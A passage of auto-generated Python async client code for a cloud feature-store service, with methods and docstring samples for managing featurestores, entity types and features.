metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("featurestore.name", request.featurestore.name),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_featurestore.Featurestore,
metadata_type=featurestore_service.UpdateFeaturestoreOperationMetadata,
)
# Done; return the response.
return response
async def delete_featurestore(
self,
request: Optional[
Union[featurestore_service.DeleteFeaturestoreRequest, dict]
] = None,
*,
name: Optional[str] = None,
force: Optional[bool] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single Featurestore. The Featurestore must not contain
any EntityTypes or ``force`` must be set to true for the request
to succeed.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.DeleteFeaturestoreRequest(
name="name_value",
)
# Make the request
operation = client.delete_featurestore(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeaturestore].
name (:class:`str`):
Required. The name of the Featurestore to be deleted.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
force (:class:`bool`):
If set to true, any EntityTypes and
Features for this Featurestore will also
be deleted. (Otherwise, the request will
only work if the Featurestore has no
EntityTypes.)
This corresponds to the ``force`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name, force])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
if force is not None:
request.force = force
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def create_entity_type(
self,
request: Optional[
Union[featurestore_service.CreateEntityTypeRequest, dict]
] = None,
*,
parent: Optional[str] = None,
entity_type: Optional[gca_entity_type.EntityType] = None,
entity_type_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new EntityType in a given Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_create_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.CreateEntityTypeRequest(
parent="parent_value",
entity_type_id="entity_type_id_value",
)
# Make the request
operation = client.create_entity_type(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.CreateEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.CreateEntityType][google.cloud.aiplatform.v1beta1.FeaturestoreService.CreateEntityType].
parent (:class:`str`):
Required. The resource name of the Featurestore to
create EntityTypes. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
entity_type (:class:`google.cloud.aiplatform_v1beta1.types.EntityType`):
The EntityType to create.
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
entity_type_id (:class:`str`):
Required. The ID to use for the EntityType, which will
become the final component of the EntityType's resource
name.
This value may be up to 60 characters, and valid
characters are ``[a-z0-9_]``. The first character cannot
be a number.
The value must be unique within a featurestore.
This corresponds to the ``entity_type_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.EntityType` An entity type is a type of object in a system that needs to be modeled and
have stored information about. For example, driver is
an entity type, and driver0 is an instance of an
entity type driver.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, entity_type, entity_type_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.CreateEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if entity_type is not None:
request.entity_type = entity_type
if entity_type_id is not None:
request.entity_type_id = entity_type_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_entity_type.EntityType,
metadata_type=featurestore_service.CreateEntityTypeOperationMetadata,
)
# Done; return the response.
return response
async def get_entity_type(
self,
request: Optional[
Union[featurestore_service.GetEntityTypeRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> entity_type.EntityType:
r"""Gets details of a single EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_get_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.GetEntityTypeRequest(
name="name_value",
)
# Make the request
response = await client.get_entity_type(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.GetEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.GetEntityType][google.cloud.aiplatform.v1beta1.FeaturestoreService.GetEntityType].
name (:class:`str`):
Required. The name of the EntityType resource. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.EntityType:
An entity type is a type of object in
a system that needs to be modeled and
have stored information about. For
example, driver is an entity type, and
driver0 is an instance of an entity type
driver.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.GetEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_entity_types(
self,
request: Optional[
Union[featurestore_service.ListEntityTypesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListEntityTypesAsyncPager:
r"""Lists EntityTypes in a given Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_list_entity_types():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.ListEntityTypesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_entity_types(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ListEntityTypesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ListEntityTypes][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListEntityTypes].
parent (:class:`str`):
Required. The resource name of the Featurestore to list
EntityTypes. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.ListEntityTypesAsyncPager:
Response message for
[FeaturestoreService.ListEntityTypes][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListEntityTypes].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ListEntityTypesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_entity_types,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListEntityTypesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def update_entity_type(
self,
request: Optional[
Union[featurestore_service.UpdateEntityTypeRequest, dict]
] = None,
*,
entity_type: Optional[gca_entity_type.EntityType] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_entity_type.EntityType:
r"""Updates the parameters of a single EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_update_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.UpdateEntityTypeRequest(
)
# Make the request
response = await client.update_entity_type(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.UpdateEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.UpdateEntityType][google.cloud.aiplatform.v1beta1.FeaturestoreService.UpdateEntityType].
entity_type (:class:`google.cloud.aiplatform_v1beta1.types.EntityType`):
Required. The EntityType's ``name`` field is used to
identify the EntityType to be updated. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Field mask is used to specify the fields to be
overwritten in the EntityType resource by the update.
The fields specified in the update_mask are relative to
the resource, not the full request. A field will be
overwritten if it is in the mask. If the user does not
provide a mask then only the non-empty fields present in
the request will be overwritten. Set the update_mask to
``*`` to override all fields.
Updatable fields:
- ``description``
- ``labels``
- ``monitoring_config.snapshot_analysis.disabled``
- ``monitoring_config.snapshot_analysis.monitoring_interval_days``
- ``monitoring_config.snapshot_analysis.staleness_days``
- ``monitoring_config.import_features_analysis.state``
- ``monitoring_config.import_features_analysis.anomaly_detection_baseline``
- ``monitoring_config.numerical_threshold_config.value``
- ``monitoring_config.categorical_threshold_config.value``
- ``offline_storage_ttl_days``
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.EntityType:
An entity type is a type of object in
a system that needs to be modeled and
have stored information about. For
example, driver is an entity type, and
driver0 is an instance of an entity type
driver.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.UpdateEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type.name", request.entity_type.name),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_entity_type(
self,
request: Optional[
Union[featurestore_service.DeleteEntityTypeRequest, dict]
] = None,
*,
name: Optional[str] = None,
force: Optional[bool] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single EntityType. The EntityType must not have any
Features or ``force`` must be set to true for the request to
succeed.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.DeleteEntityTypeRequest(
name="name_value",
)
# Make the request
operation = client.delete_entity_type(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteEntityType][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteEntityType].
name (:class:`str`):
Required. The name of the EntityType to be deleted.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
force (:class:`bool`):
If set to true, any Features for this
EntityType will also be deleted.
(Otherwise, the request will only work
if the EntityType has no Features.)
This corresponds to the ``force`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name, force])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
if force is not None:
request.force = force
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def create_feature(
self,
request: Optional[
Union[featurestore_service.CreateFeatureRequest, dict]
] = None,
*,
parent: Optional[str] = None,
feature: Optional[gca_feature.Feature] = None,
feature_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new Feature in a given EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_create_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
feature = aiplatform_v1beta1.Feature()
feature.value_type = "BYTES"
request = aiplatform_v1beta1.CreateFeatureRequest(
parent="parent_value",
feature=feature,
feature_id="feature_id_value",
)
# Make the request
operation = client.create_feature(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.CreateFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.CreateFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.CreateFeature].
parent (:class:`str`):
Required. The resource name of the EntityType to create
a Feature. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
feature (:class:`google.cloud.aiplatform_v1beta1.types.Feature`):
Required. The Feature to create.
This corresponds to the ``feature`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
feature_id (:class:`str`):
Required. The ID to use for the Feature, which will
become the final component of the Feature's resource
name.
This value may be up to 128 characters, and valid
characters are ``[a-z0-9_]``. The first character cannot
be a number.
The value must be unique within an EntityType.
This corresponds to the ``feature_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.Feature` Feature Metadata information that describes an attribute of an entity type.
For example, apple is an entity type, and color is a
feature that describes apple.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, feature, feature_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.CreateFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if feature is not None:
request.feature = feature
if feature_id is not None:
request.feature_id = feature_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_feature.Feature,
metadata_type=featurestore_service.CreateFeatureOperationMetadata,
)
# Done; return the response.
return response
async def batch_create_features(
self,
request: Optional[
Union[featurestore_service.BatchCreateFeaturesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
requests: Optional[
MutableSequence[featurestore_service.CreateFeatureRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a batch of Features in a given EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_batch_create_features():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
requests = aiplatform_v1beta1.CreateFeatureRequest()
requests.parent = "parent_value"
requests.feature.value_type = "BYTES"
requests.feature_id = "feature_id_value"
request = aiplatform_v1beta1.BatchCreateFeaturesRequest(
parent="parent_value",
                requests=[requests],
)
# Make the request
operation = client.batch_create_features(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.BatchCreateFeaturesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.BatchCreateFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchCreateFeatures].
parent (:class:`str`):
Required. The resource name of the EntityType to create
the batch of Features under. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
requests (:class:`MutableSequence[google.cloud.aiplatform_v1beta1.types.CreateFeatureRequest]`):
Required. The request message specifying the Features to
create. All Features must be created under the same
parent EntityType. The ``parent`` field in each child
request message can be omitted. If ``parent`` is set in
a child request, then the value must match the
``parent`` value in this request message.
This corresponds to the ``requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.BatchCreateFeaturesResponse` Response message for
[FeaturestoreService.BatchCreateFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchCreateFeatures].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.BatchCreateFeaturesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if requests:
request.requests.extend(requests)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.batch_create_features,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.BatchCreateFeaturesResponse,
metadata_type=featurestore_service.BatchCreateFeaturesOperationMetadata,
)
# Done; return the response.
return response
async def get_feature(
self,
request: Optional[Union[featurestore_service.GetFeatureRequest, dict]] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> feature.Feature:
r"""Gets details of a single Feature.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_get_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.GetFeatureRequest(
name="name_value",
)
# Make the request
response = await client.get_feature(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.GetFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.GetFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.GetFeature].
name (:class:`str`):
Required. The name of the Feature resource. Format:
                ``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}/features/{feature}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.Feature:
Feature Metadata information that
describes an attribute of an entity
type. For example, apple is an entity
type, and color is a feature that
describes apple.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.GetFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_features(
self,
request: Optional[Union[featurestore_service.ListFeaturesRequest, dict]] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListFeaturesAsyncPager:
r"""Lists Features in a given EntityType.
.. code-block:: python
